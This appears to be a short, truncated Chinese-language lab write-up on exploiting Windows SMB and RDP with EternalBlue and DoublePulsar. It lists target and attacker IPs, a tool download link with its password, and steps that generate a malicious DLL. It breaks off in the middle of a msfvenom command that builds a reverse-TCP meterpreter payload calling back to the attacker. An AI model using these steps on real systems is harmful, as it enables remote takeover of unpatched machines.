靶机:192.168.6.39(windows server 2008 与windows 7测试过,没有问题)
攻击机:192.168.6.42
参考链接
http://www.duorenwei.com/news/5316.html
https://www.t00ls.net/viewthread.php?tid=39343&highlight=%E6%96%B9%E7%A8%8B%E5%BC%8F
工具的下载地址:http://pan.baidu.com/s/1dEYJQaH 密码:v5cj
利用说明:
本次实验首先执行脚本攻击,对目标IP、端口、系统版本等进行设置,接下来生成恶意的dll文件,并使用脚本加载它,最终达到实验目的。
主要是针对windows主机的SMB、RDP协议进行攻击,因为我主要根据他们提供的payload的程序,利用这两个模块eternalblue和Doublepulsar可以对攻击smb和rdp协议
在pentestbox下运行
1、实现交互端口
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost&#